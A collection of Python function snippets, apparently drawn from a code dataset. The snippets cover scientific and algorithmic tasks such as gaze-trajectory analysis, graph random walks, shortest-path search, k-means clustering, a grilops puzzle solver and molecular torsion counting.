blockdata.condition.values[0]\n target_centres = targets.loc[targets['condition']==int(condition),:]\n #pprint(target_centres)\n\n target_centres = target_centres.reset_index(drop=True)\n #pick starting position.\n start_x = np.sign(blockdata['posx']).values[0]\n #select targets with opposite sign for xcentre, these will be the ones encountered in that block\n target_centres = target_centres.loc[np.sign(target_centres['xcentre'])!=start_x,:] \n target_circles = dp.target_position_circles(target_centres)\n\n \"\"\"\n\n traj_x = blockdata['posx'].values\n traj_z = blockdata['posz'].values\n trajectory = np.transpose(np.array([traj_x, traj_z]))\n\n yaw = blockdata['yaw'].values\n \n #gaze_on_screen = blockdata['hangle'].values, blockdata['vangle'].values\n gaze_on_screen = np.transpose(np.array([blockdata['hangle'].values, blockdata['vangle'].values]))\n\n #print(yaw[0])\n #index = i\n #\tviewpoint = blockdata['posx'].values, blockdata['posz'].values\n roadsection = blockdata['roadsection'].values\n\n #find time headway along MIDLINE \n \"\"\"\n start = timer()\n #idx, *_ = find_closest_index(midline, trajectory[0,:])\n idx = [find_closest_index(midline, viewpoint) for viewpoint in trajectory] \n print(idx[:10])\n print(timer()-start)\n \"\"\"\n\n #closest_indexes = [closest_node(midline, viewpoint) for viewpoint in trajectory] \n #closest indexes\n #print(np.take(midline, 5, axis = 0, mode = 'wrap'))\n #print(np.take(midline, len(midline), axis = 0, mode = 'wrap'))\n #print(np.take(midline, 0, axis = 0, mode = 'wrap'))\n _, closest_indexes = tree.query(trajectory) \n\n end_of_view = closest_indexes + moving_window\n\n #futuremid = np.take(midline, range(closest_indexes[0], end_of_view[0]), axis = 0, mode = 'wrap')\n def takemid(c,e):\n return (np.take(midline, range(c, e), axis = 0, mode = 'wrap'))\n\n start = timer()\n ml_idx, ml_screen_refs, ml_world_refs, ml_th = zip(*[\n closest_on_screen_point(takemid(c,e), t, y, g) \n for c, e, t, y, g in zip(closest_indexes, end_of_view, trajectory, yaw, gaze_on_screen)\n ])\n print(timer() - start) \n \n print(ml_screen_refs.shape)\n print(type(ml_screen_refs))\n ml_screen_refs = ml_screen_refs.reshape(-1, 2)\n ml_world_refs = ml_world_refs.reshape(-1, 2)\n print(ml_th)\n\n blockdata['midline_ref_onscreen_x'] = ml_screen_refs[:, 0]\n blockdata['midline_ref_onscreen_z'] = ml_screen_refs[:, 1]\n blockdata['midline_ref_world_x'] = ml_world_refs[:, 0]\n blockdata['midline_ref_world_z'] = ml_world_refs[:, 1]\n blockdata['th_along_midline'] = ml_th\n\n #find closest point on FUTURE PATH, with th calc along the path \n \n traj_index = range(len(trajectory))\n fp_idx, fp_screen_refs, fp_world_refs, fp_th = zip(*[\n closest_on_screen_point(trajectory[i:(i+1000),:], t, y, g) \n for i, t, y, g in zip(traj_index, trajectory, yaw, gaze_on_screen)\n ])\n #future_traj = trajectory[index:(index+window_fp), :]\n #fp_world_ref, fp_idx, dists, fp_angles = closest_on_screen_point(future_traj, viewpoint, yaw, gaze_on_screen)\n print(fp_screen_refs.shape)\n print(type(fp_screen_refs))\n fp_screen_refs = fp_screen_refs.reshape(-1, 2)\n fp_world_refs = fp_world_refs.reshape(-1, 2)\n print(ml_th)\n\n blockdata['futurepath_ref_onscreen_x'] = fp_screen_refs[:, 0]\n blockdata['futurepath_ref_onscreen_z'] = fp_screen_refs[:, 1]\n blockdata['futurepath_ref_world_x'] = fp_world_refs[:, 0]\n blockdata['futurepath_ref_world_z'] = fp_world_refs[:, 1]\n blockdata['th_along_futurepath'] = fp_th\n \n \n\n #TODO: current method runs into problems if the viewpoint is just before the midline resets (i.e. very large midline_dist_array value).\n #but not a problem for current analysis because trial starts from beginning of midline.\n #th_to_entry\n mid_dist_viewpoint = midline_dist_array[idx]\n\n mid_dist_entry = midline_dist_array[gazemodes[0]]\n th_to_entry = (mid_dist_entry - mid_dist_viewpoint) / 8.0 #if it's negative you have passed the point\n blockdata.loc[index,'veh_th_to_entry'] = th_to_entry\n\n #th_to_object\n mid_dist_object = midline_dist_array[gazemodes[1]]\n th_to_object = (mid_dist_object - mid_dist_viewpoint) / 8.0 #if it's negative you have passed the point\n blockdata.loc[index,'veh_th_to_object'] = th_to_object\t\t\n \n \"\"\"\n trialcode = row['trialcode']\n #plot\t\t\t \n #print(\"th_along_midline\", ml_timeheadway)\n #print('ml_ref', ml_world_ref)\n #print(\"th_along_futurepath\", fp_timeheadway)\n #print(\"fp_ref\", fp_world_ref)\n\n world_gaze = dp.angles_to_world(gaze_on_screen, viewpoint, yaw)\n #print(\"world_gaze\", world_gaze)\n\n plt.ylim(angles_limits_bottom[1],angles_limits_top[1])\n plt.xlim(angles_limits_bottom[0],angles_limits_top[0])\n\n plt.plot(ml_angles[:,0],ml_angles[:,1], 'C3o', markersize = .5, )\n plt.plot(fp_angles[:,0],fp_angles[:,1], 'C2o', markersize = .5)\n plt.plot(ml_screen_ref[0],ml_screen_ref[1], 'C1o', markersize = 5, markeredgecolor = 'k')\n plt.plot(fp_screen_ref[0],fp_screen_ref[1], 'C0o', markersize = 5, markeredgecolor = 'k')\n\n plt.plot(gaze_on_screen[0],gaze_on_screen[1], 'mo', markersize = 5, markeredgecolor = 'k')\n plt.title(str(trialcode))\n\n\n plt.pause(.016) \n plt.cla()\n\n plt.show()\n \"\"\"\n\t\t\n #master_steergaze = pd.concat([master_steergaze, blockdata])\n\n\n compute_time = timer()-begin\n print(\"Processing block took %f seconds\" % compute_time)\n\n\n print(\"APPENDING DATA FRAME\")\n outfilepath = datafolder + '/trout_gazeandsteering_addthfrompath2.csv'\n\n with open(outfilepath, 'a', newline = '') as sgfile:\n blockdata.to_csv(sgfile, mode='a', header=sgfile.tell()==0)\n\n #master_steergaze.to_csv(datafolder + '/trout_gazeandsteering_addthfrompath.csv')\n\n #master_steergaze.to_feather(datafilepath)", "def _SD_optimal(t):", "def calculate_first_order_correction(self,cutoff_matrix_element,L0,**kwargs):\r\n n = kwargs['ket_index']\r\n m = kwargs['bra_index']\r\n if n >= m: return 0.0\r\n evecs = self.evecs\r\n evals = self.evals\r\n # ignore drive terms whose matrix elements are beneath a specificied cutoff for speed-up. \r\n v_nm = (evecs[n].dag()*(self.v*evecs[m]))[0][0][0]\r\n if abs(v_nm) <= cutoff_matrix_element: return 0.0\r\n \r\n k = self.integer_list\r\n rho_s_vectorform = np.reshape(self.density_matrix,(self.dim**2,1),order='F')\r\n\r\n V_nm = (evecs[n]*evecs[m].dag()*(evecs[n].dag()*(self.v*evecs[m])))\r\n L_nm = qt.liouvillian(V_nm)\r\n #b = np.dot(L_nm.full(),rho_0)\r\n b = (L_nm*rho_s_vectorform).data\r\n omega_of_k = (k[n] - k[m] + 1)*self.omega\r\n \r\n A = 1j*omega_of_k * qt.identity(self.dim**2).data - L0.data\r\n \r\n #A = A.full()\r\n #del_rho = la.lstsq(A,b,rcond = 1e-6)[0]\r\n \r\n if omega_of_k == 0:\r\n del_rho = la.lsmr(A,b)[0]\r\n else:\r\n del_rho = spsolve(A,b)\r\n \r\n return nla.norm(del_rho)", "def solver(graph,homes,source,home_clusters,all_pairs_distances,all_pairs_shortest_paths):\n\n car_path = [get_car_path(graph,home_clusters,source,all_pairs_distances,all_pairs_shortest_paths, \n source_in_clusters = B1, christofides = B2) for B1 in [False,True] for B2 in [False,True]]\n\n dropoffs = [cluster_solver_utils.nearest_dropoff_efficient(graph,path,homes,all_pairs_distances) for path in car_path]\n cost = [cluster_solver_utils.eval_cost_efficient(graph,car_path[i],dropoffs[i],all_pairs_distances) for i in range(len(car_path))]\n\n minimum_cost = min(cost)\n idx = cost.index(minimum_cost)\n\n return minimum_cost, dropoffs[idx], car_path[idx]", "def getOmegaMVEst(Sn):\n\n sols = defaultdict(lambda: defaultdict(int))\n\n for a, b, c in tripletGenerator(Sn):\n if a is b or a is c or b is c: continue\n if isSolvableVect(a, b, c):\n d = solveVect(a, b, c)\n dtuple = tuple(d[:-1])\n dclass = d[-1]\n sols[dtuple][dclass] += 1\n\n nOK = nKO = 0\n for x in Sn:\n xtuple = tuple(x[:-1])\n xclass = x[-1]\n if xtuple not in sols: continue\n maj_class = max(sols[xtuple].keys(), key=lambda k: sols[xtuple][k])\n\n if maj_class == xclass:\n nOK += 1\n else:\n nKO += 1\n\n try:\n estW = nOK / (nOK + nKO)\n except ZeroDivisionError:\n estW = 0\n\n return estW", "def main():\n\n cages = [\n \"AABCCD\",\n \"EFBCGD\",\n \"EFFHGI\",\n \"EJJHGI\",\n \"EKJHGL\",\n \"KKJLLL\",\n ]\n\n peaks = [\n (0, 1),\n (0, 2),\n (1, 3),\n (1, 4),\n (1, 5),\n (2, 1),\n (2, 3),\n (3, 0),\n (3, 5),\n (4, 2),\n (5, 1),\n (5, 4),\n ]\n\n extract = {\n \"A\": (5, 2),\n \"B\": (0, 3),\n \"C\": (3, 2),\n \"D\": (1, 4),\n \"E\": (0, 1),\n \"F\": (1, 5),\n \"G\": (4, 2),\n \"H\": (3, 5),\n \"I\": (1, 0),\n \"J\": (5, 5),\n \"K\": (3, 4),\n \"L\": (5, 1),\n \"M\": (0, 5),\n \"N\": (4, 4),\n }\n\n def answer(sg):\n solved_grid = sg.solved_grid()\n s = \"\"\n s += chr(64 + solved_grid[extract[\"A\"]] + solved_grid[extract[\"B\"]])\n s += chr(64 + solved_grid[extract[\"C\"]] + solved_grid[extract[\"D\"]])\n s += chr(64 + solved_grid[extract[\"E\"]] + solved_grid[extract[\"F\"]] + solved_grid[extract[\"G\"]])\n s += chr(64 + solved_grid[extract[\"H\"]] + solved_grid[extract[\"I\"]])\n s += chr(64 + solved_grid[extract[\"J\"]] + solved_grid[extract[\"K\"]] + solved_grid[extract[\"L\"]])\n s += chr(64 + solved_grid[extract[\"M\"]] + solved_grid[extract[\"N\"]])\n return s\n\n sym = grilops.make_number_range_symbol_set(1, 6)\n lattice = grilops.get_square_lattice(6)\n sg = grilops.SymbolGrid(lattice, sym)\n\n add_sudoku_constraints(sg)\n\n # Constrain regions to match the cages and be rooted at the peaks.\n cage_label_to_region_id = {}\n for py, px in peaks:\n cage_label_to_region_id[cages[py][px]] = lattice.point_to_index((py, px))\n\n rc = grilops.regions.RegionConstrainer(lattice, sg.solver)\n for y, x in lattice.points:\n sg.solver.add(\n rc.region_id_grid[(y, x)] == cage_label_to_region_id[cages[y][x]])\n\n # Within each region, a parent cell must have a greater value than a child\n # cell, so that the values increase as you approach the root cell (the peak).\n for p in lattice.points:\n for n in sg.edge_sharing_neighbors(p):\n sg.solver.add(Implies(\n rc.edge_sharing_direction_to_index(n.direction) == rc.parent_grid[p],\n n.symbol > sg.grid[p]\n ))\n\n if sg.solve():\n sg.print()\n print()\n print(answer(sg))\n while not sg.is_unique():\n print()\n print(\"Alternate solution\")\n sg.print()\n print()\n print(answer(sg))\n else:\n print(\"No solution\")", "def global_analysis(tomo, b_th, c=18):\n\n ## Thesholding and Volume analysis\n if c == 6:\n con_mat = [ [[0, 0, 0], [0, 1, 0], [0, 0, 0]],\n [[0, 1, 0], [1, 1, 1], [0, 1, 0]],\n [[0, 0, 0], [0, 1, 0], [0, 0, 0]] ]\n elif c == 18:\n con_mat = [[[0, 1, 0], [1, 1, 1], [0, 1, 0]],\n [[1, 1, 1], [1, 1, 1], [1, 1, 1]],\n [[0, 1, 0], [1, 1, 1], [0, 1, 0]]]\n elif c == 26:\n con_mat = [[[1, 1, 1], [1, 1, 1], [1, 1, 1]],\n [[1, 1, 1], [1, 1, 1], [1, 1, 1]],\n [[1, 1, 1], [1, 1, 1], [1, 1, 1]]]\n else:\n raise ValueError\n tomo_lbl, num_lbls = sp.ndimage.label(tomo >= b_th, structure=np.ones(shape=[3, 3, 3]))\n tomo_out = np.zeros(shape=tomo.shape, dtype=int)\n lut = np.zeros(shape=num_lbls+1, dtype=int)\n\n ## COUNTING REGIONS METHODS\n # import time\n # hold_t = time.time()\n # for lbl in range(1, num_lbls + 1):\n # ids = tomo == lbl\n # feat_sz = len(ids)\n # tomo_out[ids] = feat_sz\n # # print('[1]:', lbl, 'of', num_lbls)\n # print time.time() - hold_t\n\n ## COUNTING PIXELS METHOD\n ## Count loop\n # cont, total = 0, np.prod(tomo.shape)\n # import time\n # hold_t = time.time()\n for x in range(tomo.shape[0]):\n for y in range(tomo.shape[1]):\n for z in range(tomo.shape[2]):\n id = tomo_lbl[x, y, z]\n lut[id] += 1\n # cont += 1\n # print('[1]:', cont, 'of', total)\n #\n ## Write loop\n # cont, total = 0, np.prod(tomo.shape)\n\n for x in range(tomo.shape[0]):\n for y in range(tomo.shape[1]):\n for z in range(tomo.shape[2]):\n id = tomo_lbl[x, y, z]\n if id > 0:\n tomo_out[x, y, z] = lut[id]\n # cont += 1\n # print('[1]:', cont, 'of', total)\n # print time.time() - hold_t\n\n return tomo_out", "def beam_search(X, u, w, b, relLabels):\n\n candidate_paths = [[] for _ in range(10)] # contains the candidate label sets\n candidate_vals =[[] for _ in range(10)] # contains the label values (-1/1) for each candidate set\n candidate_scores = [0. for _ in range(10)]\n min_score = -1000\n\n iter = 0\n start = 0\n while True:\n # print(\"Iter: \", iter)\n intermediate_paths = {}\n # intermediate_paths_val = []\n interim_scores = []\n hash_table = {}\n\n cnt_paths = 0\n for cp in range(5):\n labels_curr = candidate_paths[cp]\n labels_val_curr = candidate_vals[cp]\n scores_curr = candidate_scores[cp]\n Y = -np.ones((10, 1))\n for lv in range(len(labels_val_curr)):\n Y[labels_curr[lv]] = labels_val_curr[lv]\n\n for l in range(10):\n candidate_interim = labels_curr[:]\n candidate_vals_interim = labels_val_curr[:]\n # if l in labels_curr:\n # continue\n\n temp_relLabels = []\n for lc in range(len(labels_curr)):\n temp_relLabels.extend(relLabels[labels_curr[lc]])\n\n # temp_relLabels = np.array(list(set(temp_relLabels)))\n temp_relLabels = np.array(list(set(relLabels[l]).intersection(set(labels_curr))))\n model_pos = returnModelVal(X, Y, 1.0, u[l], u[l], b[l][0], np.array(temp_relLabels))\n candidate_interim.append(l)\n\n if model_pos < 0:\n # print('hello')\n candidate_vals_interim.append(-1)\n interim_scores.append(-model_pos)\n else:\n candidate_vals_interim.append(1)\n interim_scores.append(model_pos)\n\n hash_table[cnt_paths] = candidate_interim\n intermediate_paths[cnt_paths] = candidate_vals_interim\n cnt_paths += 1\n # For the first iteration, just iterate once - all labels in one iteration\n if start == 0:\n start = 1\n break\n\n temp_paths = intermediate_paths\n interim_zip = zip(intermediate_paths, interim_scores)\n sorted_scores = sorted(interim_zip, key=lambda x: x[1], reverse=True)[:5]\n intermediate_paths, scores = zip(*sorted_scores)\n\n temp_cand = []\n temp_val = []\n for i in range(len(intermediate_paths)):\n temp_cand.append(hash_table[intermediate_paths[i]])\n temp_val.append(temp_paths[intermediate_paths[i]])\n # candidate_scores[i] += scores[i]\n\n candidate_paths = temp_cand\n candidate_vals = temp_val\n print(candidate_paths)\n print(candidate_vals)\n # print(scores)\n # candidate_scores = scores\n\n # Exit condition from loop\n # if max(interim_scores) < min_score:\n # break\n #\n # min_score = min(interim_scores)\n\n iter += 1\n if iter > 5:\n break\n\n candidate_dict = {}\n for i in range(5):\n for c in range(len(candidate_paths[i])):\n if candidate_paths[i][c] not in candidate_dict:\n candidate_dict[candidate_paths[i][c]] = candidate_vals[i][c]\n elif candidate_dict[candidate_paths[i][c]] != 2:\n if candidate_dict[candidate_paths[i][c]] != candidate_vals[i][c]:\n candidate_dict[candidate_paths[i][c]] = 2.\n\n print(candidate_dict)\n exit()\n return candidate_dict", "def rwgraph_analyze2(input=(None)):\r\n\r\n\r\n #set up graph and degree distribution arrays\r\n n=2000\r\n m=4\r\n G=nx.barabasi_albert_graph(n, m, seed=5)\r\n Nt=100\r\n M=20000\r\n maxdeg=0\r\n degree_dist=[]\r\n for i in range(0,n):\r\n degree_dist.append(G.degree[i])\r\n if G.degree[i]>maxdeg:\r\n maxdeg=G.degree[i]\r\n j=i\r\n\r\n #set inital conditions and D\r\n y0=np.zeros(n,dtype=int)\r\n y0[j]=200\r\n D=1\r\n #define time for odi Int\r\n t=np.arange(Nt+1,dtype=int)\r\n #set up operators\r\n A = nx.adjacency_matrix(G)\r\n Q = A.toarray().sum(axis=1)\r\n L=np.diag(Q)-A.toarray()\r\n Q_inv=1/Q\r\n Ls=np.diag(np.ones(n))-np.matmul(np.diag(Q_inv),A.toarray())\r\n Ls_tran=np.transpose(Ls)\r\n\r\n #convert to sparse operators and include diffusion\r\n L_spar = scipy.sparse.csr_matrix(-D*L)\r\n Ls_spar = scipy.sparse.csr_matrix(-D*Ls)\r\n Ls_tran_spar = scipy.sparse.csr_matrix(-D*Ls_tran)\r\n A=nx.adjacency_matrix(G)\r\n L=-D*(scipy.sparse.diags(degree_arr)-A)\r\n Ls=-D*(scipy.sparse.diags(np.ones(N))-scipy.sparse.diags(1/degree_arr).dot(A))\r\n\r\n #define operators\r\n def Lap(y,t):\r\n return scipy.sparse.csr_matrix.__mul__(L_spar,y)\r\n def Lap_Ls(y,t):\r\n return scipy.sparse.csr_matrix.__mul__(Ls_spar,y)\r\n def Lap_Ls_tran(y,t):\r\n return scipy.sparse.csr_matrix.__mul__(Ls_tran_spar,y)\r\n\r\n #solutions of different operators\r\n solL=scipy.integrate.odeint(Lap,y0,t)\r\n solLs=scipy.integrate.odeint(Lap_Ls,y0,t)\r\n solLs_tran=scipy.integrate.odeint(Lap_Ls_tran,y0,t)\r\n\r\n\r\n #finds eigen values and vectors and puts them into order\r\n def eigen(L):\r\n eigen_values,eigen_vectors=scipy.linalg.eig(-L)\r\n idx = eigen_values.argsort()[::-1]\r\n eigen_values = eigen_values[idx]\r\n eigen_vectors = eigen_vectors[:,idx]\r\n return eigen_values,eigen_vectors\r\n\r\n #finds all eigen values and eigen vectors of the different operators. can use sparse matrics\r\n eigen_values_LS,eigen_vectors_LS=eigen(Ls)\r\n eigen_values_LS_tran,eigen_vectors_LS_tran=eigen(Ls_tran)\r\n eigen_values_L,eigen_vectors_L=eigen(L)\r\n eigen_values_L2,eigen_vectors_L2=eigen(L*0.36)\r\n\r\n ### could have eigs here as didn't end up using all eigenvalues ####\r\n #eigen values graph\r\n n0=len(eigen_values_L)\r\n eig_nums=np.arange(n0)\r\n plt.figure(figsize=(12, 6))\r\n plt.scatter(eig_nums[0:10],eigen_values_L2[0:10],s=50,marker=\"x\" ,label='L , D=0.36')\r\n plt.scatter(eig_nums[0:10],eigen_values_LS[0:10],s=50, marker=\"|\",label='LS , D=1')\r\n plt.scatter(eig_nums[0:10],eigen_values_LS_tran[0:10],s=50,marker='_',label='LS_tran , D=1')\r\n plt.scatter(eig_nums[0:10],eigen_values_L[0:10],s=50,marker=\"+\" ,label='L , D=1')\r\n plt.legend(loc=\"lower left\", fontsize=12,fancybox=True, framealpha=1, shadow=True, borderpad=1)\r\n plt.xlabel('eigen value number')\r\n plt.ylabel('eigenvalue')\r\n plt.title(\"Eigenvlaues of Laplacian Matrixs\")\r\n plt.show()\r\n\r\n print(\"4 biggest eigenvalues for each operater\")\r\n print('L=',eigen_values_L[0:4])\r\n print('Ls=',eigen_values_LS[0:4])\r\n print('Ls_tran=',eigen_values_LS_tran[0:4])\r\n #prints 4 biggest eigen values\r\n #counts node distrubtion by creating dictionary\r\n def result_count(sol,Nt,G):\r\n \"\"\" returns cumlative frequency/probailties for nodes of same degree and returns dictionary\"\"\"\r\n n = G.number_of_nodes()\r\n dict_freq={}\r\n for i in range(n):\r\n k=G.degree(i)\r\n if k not in dict_freq:\r\n dict_freq[k]=sol[Nt,i]\r\n else:\r\n dict_freq[k]+=sol[Nt,i]\r\n return dict_freq\r\n\r\n #frequency count of solutions\r\n dict_freq=result_count(solL,Nt,G)\r\n dict_freq2=result_count(solLs,Nt,G)\r\n dict_freq3=result_count(solLs_tran,Nt,G)\r\n\r\n #random walk data\r\n X=rwgraph(G,j,20000,100)\r\n Listnodes7=[]\r\n for i in range(20000):\r\n Listnodes7.append(G.degree(X[i,100]))\r\n X=rwgraph(G,j,200,100)\r\n Listnodes8=[]\r\n for i in range(200):\r\n Listnodes8.append(G.degree(X[i,100]))\r\n X=rwgraph(G,j,50000,5000)\r\n Listnodes9=[]\r\n for i in range(50000):\r\n Listnodes9.append(G.degree(X[i,5000]))\r\n listfreq7=CountFrequency(Listnodes7)\r\n listfreq8=CountFrequency(Listnodes8)\r\n listfreq9=CountFrequency(Listnodes9)\r\n listfreq_deg=CountFrequency(degree_dist)\r\n z2=[]\r\n z3=[]\r\n z1=[]\r\n z_deg2=[]\r\n z_deg3=[]\r\n z_deg1=[]\r\n for i in listfreq7:\r\n z2.append(listfreq7[i]/(listfreq_deg[i]*20000))\r\n z_deg2.append(i)\r\n for i in listfreq8:\r\n z3.append(listfreq8[i]/(listfreq_deg[i]*200))\r\n z_deg3.append(i)\r\n for i in listfreq8:\r\n z1.append(listfreq9[i]/(listfreq_deg[i]*50000))\r\n z_deg1.append(i)\r\n #operator solutions compared to node degree frequency\r\n z4,z5,z6=[],[],[]\r\n z_deg4,z_deg5,z_deg6=[],[],[]\r\n for i in dict_freq:\r\n z4.append(dict_freq[i]/(listfreq_deg[i]*200))\r\n z_deg4.append(i)\r\n for i in dict_freq2:\r\n z5.append(dict_freq2[i]/(listfreq_deg[i]*200))\r\n z_deg5.append(i)\r\n for i in dict_freq3:\r\n z6.append(dict_freq3[i]/(listfreq_deg[i]*200))\r\n z_deg6.append(i)\r\n\r\n plt.figure(figsize=(15, 10))\r\n plt.scatter(z_deg1, z1,label='Nt=5000, M=50000')\r\n plt.scatter(z_deg2, z2,label='Nt=100, M=20000')\r\n plt.scatter(z_deg3, z3,label='Nt=100, M=200')\r\n plt.scatter(z_deg4, z4,label='L, Nt=100')\r\n plt.scatter(z_deg5, z5,label='Ls, Nt=100')\r\n plt.scatter(z_deg6, z6,label='Ls_tran, Nt=100')\r\n plt.ylim((-0.005,0.020))\r\n plt.xlabel('degree of node')\r\n plt.ylabel('frequency of final position / M*frequency of degree')\r\n plt.legend(loc=\"upper left\", fontsize=12,fancybox=True, framealpha=1, shadow=True, borderpad=1)\r\n plt.title(\"Frequency of final positions relative to number of nodes of that degree, for changing times Nt and M.\")\r\n plt.show()\r\n\r\n #code to produce final graph\r\n iarray1=LinearModel(G,x=j,i0=1,L1='L',D=1,tf=20,Nt=Nt)\r\n iarray2=LinearModel(G,x=j,i0=1,L1='Ls',D=1,tf=20,Nt=Nt)\r\n iarray3=LinearModel(G,x=j,i0=1,L1='Lst',D=1,tf=20,Nt=Nt)\r\n tarray = np.linspace(0,5,Nt+1)\r\n plt.figure(figsize=(12, 6))\r\n plt.plot(tarray, iarray1[:,7] ,label='rand node L,deg=46',color='b',alpha=0.5)\r\n plt.plot(tarray, iarray2[:,7] ,label='rand node Ls,deg=46',marker='|',color='r')\r\n plt.scatter(tarray, iarray3[:,7] ,label='rand node LST,deg=46',marker='_',color='y')\r\n plt.scatter(tarray, iarray1[:,1801] ,label='rand node L, deg=5',color='m',alpha=0.5,marker='+')\r\n plt.plot(tarray, iarray2[:,1801] ,label='rand node Ls,deg=5',marker='|',color='c')\r\n plt.scatter(tarray, iarray3[:,1801] ,label='rand node LST,deg=5',marker='_',color='g')\r\n plt.xlabel('time')\r\n plt.ylabel('representive frequency')\r\n plt.legend()\r\n plt.title(\"Comparing repestive frequency of a random nodes, for the different linear models,time step=50,D=0.1\")\r\n plt.show()\r\n return None #modify as needed\r", "def safeJourney(Alist,s,d):\n #Initialize dictionaries\n dinit = 10**6\n Edict = {} #Explored nodes\n Udict = {} #Unexplored nodes\n path = [[] for l in Alist]\n\n Alen = len(Alist) #length of Alist\n dinits = [dinit]*Alen #list of airport indexes\n Udict = dict(zip(list(range(Alen)),dinits)) #zip into dictionary\n Udict[s] = 0\n path[s] = [s]\n \n #Main search\n while len(Udict)>0:\n #Find node with min d in Udict and move to Edict\n dmin = dinit\n for n,w in Udict.items():\n if w<dmin:\n dmin=w\n nmin=n\n Edict[nmin] = Udict.pop(nmin)\n print(\"moved node\", nmin)\n\n #Update provisional distances for unexplored neighbors of nmin\n \n #for n,w in G.adj[nmin].items():\n for item in Alist[nmin]: #nminth element is a list of two element tuples (node, weight)\n n = item[0] #first elt of tuple is node/neighbour\n w = item[1] #2nd elt is density/weigh\n #for n,w in etc_______________________-\n \n if n in Edict:\n pass\n elif n in Udict:\n #dcomp = dmin + w\n dcomp = max(w,dmin) #take largest value to record most dangerous segment\n if dcomp<Udict[n]:\n print(Udict)\n Udict[n]=dcomp\n path[n] = path[nmin] + [n]\n #path[n].extend(path[nmin])\n #path[n] = path[nmin]\n \n #path[n].append(n) #n not nmin\n print(path)\n # else:\n #dcomp = dmin + w\n # dcomp = max(w,dmin)\n # Udict[n] = dcomp\n #path[n].extend(path[nmin])\n #path[n].append(nmin) \n \n if nmin == d: #if current node is destination\n return path[d],Edict[d]\n return [] #no path", "def estimate_nc(self):\n mol = self.m\n torsma = '[!$(*#*)&!D1]~[!$(*#*)&!D1]'\n q = Chem.MolFromSmarts(torsma)\n matches = mol.GetSubstructMatches(q)\n nmat = len(matches)\n #torsions = []\n\n # since mostly the molecules concerned here are amons\n # with N_I <=7, we care about 3- to 7-membered rings\n atsr = _get_ring_nodes(mol,3,7,F)\n #print ' -- atsr = ', atsr\n inrs = np.zeros(self.na, dtype=int) # [this atom is] in [how many] number of rings\n for ia in self.ias_heav:\n _sets = []\n for _ats in atsr:\n if ia in _ats:\n _sets.append(_ats)\n #print ' -- ia, _sets = ', ia, _sets\n inr = find_number_of_unique_set(_sets)\n inrs[ia] = inr\n #print ' -- inrs = ', inrs\n if nmat == 0:\n ns = [1]\n if self.debug: print(' |__ ns = ', ns)\n nc = 1\n self.nc = nc\n else:\n ns = []; patts = []\n scale = 0\n for match in matches:\n j = match[0]\n k = match[1]\n cb = set([j,k])\n bond = mol.GetBondBetweenAtoms(j, k)\n aj = mol.GetAtomWithIdx(j)\n ak = mol.GetAtomWithIdx(k)\n hj, hk = [ _hyb[_a.GetHybridization()] for _a in [aj,ak] ]\n iok1 = (hj != 2); iok2 = (hj != 3)\n iok3 = (hk != 2); iok4 = (hk != 3)\n if (iok1 and iok2) or (iok3 and iok4): continue\n\n # do not allow internal rotation about two adjacent sp2 atoms are in a ring\n if inrs[j] and inrs[k] and hj==2 and hk==2: continue\n\n pjk = []\n jk = [j,k]\n hsjk = [hj,hk]\n for _ in range(2):\n ia1 = jk[_]\n ia2 = j if ia1==k else k\n hyb = hsjk[_]\n nbrs = np.setdiff1d(self.ias[self.bom[ia1]>0], [ia2])\n ihs = (self.zs[nbrs]==1)\n if np.all(ihs): # case 'a', e.g., 'a1','a2','a3'\n # check ~X-CH3, ~X-NH2, ...\n nh = len(ihs)\n if hyb==3:\n # for rotor X-C in ~X-CH3, one torsion is allowed\n sn = {1:'a3', 2:'a2', 3:'a1'}[nh]\n else: # hyb==2\n sn = {1:'a2', 2:'a1', 3:'a1'}[nh]\n else: # case 'b', e.g., 'b1','b2','b3'\n inr = inrs[ia1]\n if self.cns[ia1]==2 and inr: # e.g., O<, S<, Se<,\n sn = 1\n else:\n if hyb==3:\n sn = 2 if inr <= 1 else 1 # {0:'b3', 1:'b3', 2:'b2', 3:'b1', 4:'b1'}[inr]\n else: # hyb==2:\n sn = 'b2' if inr == 0 else 'b1'\n #sn = {0:'b2', 1:'b1', 2:'b1', 3:'b1'}[inr]\n _patt = '%d%s'%(hyb,sn)\n pjk.append(_patt)\n #print 'j,k = ', j,k, ', pjk = ', pjk\n nci = min([ int(patt[-1]) for patt in pjk ]) # ndic[patt]; sci = scdic[patt]\n if nci > 1:\n ns.append( nci )\n if not np.any([inrs[j],inrs[k]]):\n scale += 1\n if scale == 0: scale = 1\n nc = np.int(np.floor(np.product(ns))) * scale #* 2\n self.nc = nc if nc > 99 else 99\n if self.debug: print(' |__ ns = ', ns)\n if self.debug: print(' |__ scale = %d, nc = %d'%(scale, nc))\n self.ns = np.array(ns, np.int)", "def floyd_warshall(A):\n n = A.shape[0]\n \n for k in tqdm(range(1, n+1)):\n for i in range(n):\n for j in range(n):\n A[i,j,k] = min(A[i,j,k-1], A[i,k-1,k-1]+A[k-1,j,k-1])\n \n \n for i in range(n):\n if A[i,i,n] <0:\n min_path = 'Negative cycle'\n return min_path\n min_path = np.min(A[:,:,n])\n \n return min_path", "def kmeans(matrix, k) :\n clusters = [0 for i in range(k)]\n lastcluster=[0 for i in range(k)]\n min_=0\n max_=matrix.__len__()\n print \"len\",max_\n cluster = [0 for i in range(k)]\n for i in range(k) :\n\n cluster[i]=int(random.random() * (max_ - min_) + min_)\n clusters[i]=matrix[cluster[i]]\n lastcluster[i]=matrix[cluster[i]]\n #print cluster[i],clusters[i]\n\n lastmatchs = [ [] for i in range(k)]\n\n \"\"\" initial the round is 100\"\"\"\n rounds = 100\n while rounds > 0 :\n matchs = [ [] for i in range(k)]\n print 'round \\t',rounds\n for i in range(len(matrix)) :\n bestmatch_cluster = None\n\n min_distance = 100000\n for j in range(k) :\n dis = pearson_distance(clusters[j], matrix[i])\n if dis < min_distance :\n min_distance = dis\n bestmatch_cluster = j\n matchs[bestmatch_cluster].append(i)\n\n print_matchs(matchs)\n #print_matchs(lastmatchs)\n\n\n\n if matchs == lastmatchs : break\n #if cluster== lastcluster :break\n lastmatchs = [[ item for item in matchs[i] ] for i in range(k)]\n\n #move the centroids to the average of their members\n for j in range(k) :\n avg = [0.0 for i in range(len(matrix[0])) ]\n for m in matchs[j] :\n vec = matrix[m]\n for i in range(len(matrix[0])) :\n avg[i] += vec[i]\n avg = [ item / len(matrix[0]) for item in avg]\n clusters[j] = avg\n lastcluster=clusters\n\n\n rounds -= 1\n print \"rounds:\",100-rounds\n print \"result:\"\n for i in matchs:\n print i", "def astar_multi(maze):\n # TODO: Write your code here\n gFunction = {}\n frontier = PriorityQueue()\n path = 